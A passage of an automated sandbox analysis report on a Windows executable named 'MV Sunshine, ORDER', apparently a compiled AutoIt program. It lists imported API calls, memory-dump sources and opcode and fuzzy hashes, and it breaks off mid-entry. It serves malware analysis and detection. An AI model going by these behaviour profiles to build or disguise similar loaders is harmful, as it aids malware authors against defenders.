                      • Instruction Fuzzy Hash: 845133745442468FCF25DF68C4886FA7BA9EFAA310F158056EC919B3E0C7349C42CBB1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memset$_memmove
                      • String ID: ERCP
                      • API String ID: 2532777613-1384759551
                      • Opcode ID: 360328a87e580fef5188c22f26181f08023c4b8a440d37cf37a53858d7af5327
                      • Instruction ID: 2a5d21d1848f6dfab18572350ea4fddedf5fa483f97d6290c5f2268224812df1
                      • Opcode Fuzzy Hash: 360328a87e580fef5188c22f26181f08023c4b8a440d37cf37a53858d7af5327
                      • Instruction Fuzzy Hash: 6651D471900709DFDB24CFA9C8817AABBF8FF44750F20856EEA4ACB250E775A580CB50
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A0F910,00000000,?,?,?,?), ref: 00A07C4E
                      • GetWindowLongW.USER32 ref: 00A07C6B
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A07C7B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: 9ace71a3be96f401cc935515ba5a0966ce33a67c40e6e0de9cffb6c8ac1bd1a1
                      • Instruction ID: 95f975f4e3dede672460def5af408d26b0bc84cbdfce6780e1ae1cdb50c2b8c7
                      • Opcode Fuzzy Hash: 9ace71a3be96f401cc935515ba5a0966ce33a67c40e6e0de9cffb6c8ac1bd1a1
                      • Instruction Fuzzy Hash: ED319E31A04209AFEB219F78EC41BEA77A9FB45324F244725F975A32E0D731E8519B60
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A076D0
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A076E4
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A07708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: d4244d9ece2640dde85ed3460015390295b00a94432aa2ac4076ec2e1532a2f5
                      • Instruction ID: 6e3005d0877f9272fc99d53fada1417a47898c420bf3eeb5a43950cedc190184
                      • Opcode Fuzzy Hash: d4244d9ece2640dde85ed3460015390295b00a94432aa2ac4076ec2e1532a2f5
                      • Instruction Fuzzy Hash: A6218D3251021DABDF21CFA4DC46FEE3B69EB88754F110214FE156B1D0DAB2A8518BA0
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A06FAA
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A06FBA
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A06FDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: e758c3fe9e136a096f9bd12cd54f7428db35dbaa6077385ae7bbdfbb5846ff9e
                      • Instruction ID: aa60da22455fcebbd532957c7e98c5d2a8ceb8f7dd14ca1683e25afb9695b0dc
                      • Opcode Fuzzy Hash: e758c3fe9e136a096f9bd12cd54f7428db35dbaa6077385ae7bbdfbb5846ff9e
                      • Instruction Fuzzy Hash: FB21A43261011DBFDF119F54EC85FAB37AAEF89768F018124FA159B1D0C671AC62CBA0
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A079E1
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A079F6
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A07A03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: a9636f6a3ad8d16f775edf5ea6ca4a914c24f479d589b26b50aa560af5d9ddde
                      • Instruction ID: 243ae10dc8f565d937c409a7f2bedf846799ef8a3298cd7bffac8dd532e7798c
                      • Opcode Fuzzy Hash: a9636f6a3ad8d16f775edf5ea6ca4a914c24f479d589b26b50aa560af5d9ddde
                      • Instruction Fuzzy Hash: 0411E732654208BEEF109F60DC05FAF37A9EF89764F014519F641A60D0D272A811CB60
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00984C2E), ref: 00984CA3
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984CB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      • Opcode ID: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
                      • Instruction ID: 2d6674756f6a9b0719033c11a7a0a943e606db343fc6ef593603e4d7c6989bae
                      • Opcode Fuzzy Hash: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
                      • Instruction Fuzzy Hash: B4D0173051072BDFDB30AF71EA1864676E9BF06791B11CC3A98C6E6A90E678D881CB50
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00984CE1,?), ref: 00984DA2
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984DB4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-1355242751
                      • Opcode ID: 114d542de3df89b4b3606f4bc9894e61d2c42ae7d31e169d7638f2bd6666d87f
                      • Instruction ID: 832583cfe2627881cd6587ad34249bb3b4c7f5e69db26aea965b73549f9c88ca
                      • Opcode Fuzzy Hash: 114d542de3df89b4b3606f4bc9894e61d2c42ae7d31e169d7638f2bd6666d87f
                      • Instruction Fuzzy Hash: EBD01271550717DFD7309F71D80864676D8BF05355B118C3AD8C5E6690D774D881CB50
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00984D2E,?,00984F4F,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984D6F
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984D81
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-3689287502
                      • Opcode ID: b34bab289af28493e3c5bee31d5766b0c9744fa228a64d02300d5fbc1c301f5e
                      • Instruction ID: 240b0e5238667cd24ea9af1b118bdef560eba148cbc7d42d5514097c094be282
                      • Opcode Fuzzy Hash: b34bab289af28493e3c5bee31d5766b0c9744fa228a64d02300d5fbc1c301f5e
                      • Instruction Fuzzy Hash: 92D01770510717DFDB30AF71D808616B6E8BF16352B118D3AA886E6A90E670E881CB51
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00A012C1), ref: 00A01080
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A01092
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: 6a84e041c0cf76688a805c65f44aaf02a33e65812acb9d39c4c05d01e272c2c6
                      • Instruction ID: 309d0485a04ffccc5bb8605f2ca92981d0b32eae261f5269dee0cc78acdb26d8
                      • Opcode Fuzzy Hash: 6a84e041c0cf76688a805c65f44aaf02a33e65812acb9d39c4c05d01e272c2c6
                      • Instruction Fuzzy Hash: 2FD01230510716DFD7309FB5E81859776E5AF05351F118E3AB9C9DA590E770C8C1C650
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F9009,?,00A0F910), ref: 009F9403
                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9415
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetModuleHandleExW$kernel32.dll
                      • API String ID: 2574300362-199464113
                      • Opcode ID: cd30ce1365460f06de6dbedd34d3f571ca7e37888b096f7d2b7397bf719b3bf7
                      • Instruction ID: 37800b608e9334c00a6d205d758d728581a8174f78726bfb7249da22e6ead656
                      • Opcode Fuzzy Hash: cd30ce1365460f06de6dbedd34d3f571ca7e37888b096f7d2b7397bf719b3bf7
                      • Instruction Fuzzy Hash: F2D0C73050872BDFCB318FB1D90820272E8BF25342B00CC3AA682E29A0E670C8C2CB50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LocalTime__swprintf
                      • String ID: %.3d$WIN_XPe
                      • API String ID: 2070861257-2409531811
                      • Opcode ID: 0d18d0d9672e6fc231220eaa5c4cc8a17f34d8e178e60704222285427e18f343
                      • Instruction ID: 8226c632f4ac8f9a21877b09f4d3a5e1d5865ab4de0519788763407b4eda2ad9
                      • Opcode Fuzzy Hash: 0d18d0d9672e6fc231220eaa5c4cc8a17f34d8e178e60704222285427e18f343
                      • Instruction Fuzzy Hash: 47D012B1C04118EACB14AA90CC44EF9737CA719301F100D96B506A1445F23C9F859F2A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                      • Instruction ID: 490c586e2d0aa3e3ae720ca9f5198c9544cc339e93501e47d160306671d9b382
                      • Opcode Fuzzy Hash: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                      • Instruction Fuzzy Hash: 13C16C75A4421AEFCB14CF94C884AAEF7B9FF48710B11899AE805EB351E730DD81DB90
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 009FE3D2
                      • CharLowerBuffW.USER32(?,?), ref: 009FE415
                        • Part of subcall function 009FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FDAD9
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009FE615
                      • _memmove.LIBCMT ref: 009FE628
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: 54aeb54088c85ce84cc7999c7135b6e02f7b782b13773437e600bd95cac1f36b
                      • Instruction ID: 631b087171d4fe6a3829a8f3da9829ceb05279e6897695f0fbfa37b97c128b81
                      • Opcode Fuzzy Hash: 54aeb54088c85ce84cc7999c7135b6e02f7b782b13773437e600bd95cac1f36b
                      • Instruction Fuzzy Hash: D7C159716083059FC714DF28C480A6ABBE4FF89718F14896EF9999B361D731E946CB82
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 009F83D8
                      • CoUninitialize.OLE32 ref: 009F83E3
                        • Part of subcall function 009DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DDAC5
                      • VariantInit.OLEAUT32(?), ref: 009F83EE
                      • VariantClear.OLEAUT32(?), ref: 009F86BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: 6cae1b474088308ef30a4d88cae85845e81522aec6bb2ac8ce2d2b46474558b4
                      • Instruction ID: 4db79862775e8f4cf01689935a925eb70f1f2a6d7c525690ed883b6879d2117d
                      • Opcode Fuzzy Hash: 6cae1b474088308ef30a4d88cae85845e81522aec6bb2ac8ce2d2b46474558b4
                      • Instruction Fuzzy Hash: EAA15C752047059FDB50EF58C885B2AB7E4BF88314F18884DFA9A9B3A1CB35ED05CB42
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C32
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C4A
                      • CLSIDFromProgID.OLE32(?,?,00000000,00A0FB80,000000FF,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C6F
                      • _memcmp.LIBCMT ref: 009D7C90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID:
                      • API String ID: 314563124-0
                      • Opcode ID: 24eecb569dde944e4749a66d0c2da55c4b0c866d9c638d6318f21ac37cb7f4b0
                      • Instruction ID: d51172332ea2277634de6d3ecbae26894add1cf0433d5e9c7e5f10d6a83c01ae
                      • Opcode Fuzzy Hash: 24eecb569dde944e4749a66d0c2da55c4b0c866d9c638d6318f21ac37cb7f4b0
                      • Instruction Fuzzy Hash: 6A810C75A00109EFCB04DFE4C984EEEB7B9FF89315F208599E505AB250DB71AE06CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: 813ea0f52e7775a0dfc9a1bf810c8a9e9ef01a170c44e54daa21dfd9aec90caf
                      • Instruction ID: 7cb87bda7f3c526c8ef8278619fa2eef987f28df265d62505516a60adb019356
                      • Opcode Fuzzy Hash: 813ea0f52e7775a0dfc9a1bf810c8a9e9ef01a170c44e54daa21dfd9aec90caf
                      • Instruction Fuzzy Hash: 5651CB306887019EDB20AFA9D891B39F3E9AF45310F24CC1FE956DB3D1EB7498409B51
                      APIs
                      • GetWindowRect.USER32(015C1D40,?), ref: 00A09AD2
                      • ScreenToClient.USER32(00000002,00000002), ref: 00A09B05
                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A09B72
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: 5dbe64719db244f05e251d47150b0a986ee2588abb59da9558136376dc572a67
                      • Instruction ID: 4afbd64ed00e04406bcc1257e6b157e3401d7ecb3408909a7e3fdd7551c2961e
                      • Opcode Fuzzy Hash: 5dbe64719db244f05e251d47150b0a986ee2588abb59da9558136376dc572a67
                      • Instruction Fuzzy Hash: B7512D34A00209EFCF20DF68E980AAE7BB5FB56360F108159F8159B2D1D731AD82CB90
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 009F6CE4
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F6CF4
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009F6D58
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F6D64
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorLast$__itow__swprintfsocket
                      • String ID:
                      • API String ID: 2214342067-0
                      • Opcode ID: 20710d36a07bf093ad38b79157c678688084028b7f63ce48f0a815406815464b
                      • Instruction ID: de01a78f4f7a050ac233d12102e2df16d0d3b6786736016cb399d7e6a5ba95ae
                      • Opcode Fuzzy Hash: 20710d36a07bf093ad38b79157c678688084028b7f63ce48f0a815406815464b
                      • Instruction Fuzzy Hash: ED418275740204AFEB20BF64DC86F3A77A99B84B10F448418FA5AAB3D3DA759D018791
                      APIs
                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A0F910), ref: 009F67BA
                      • _strlen.LIBCMT ref: 009F67EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
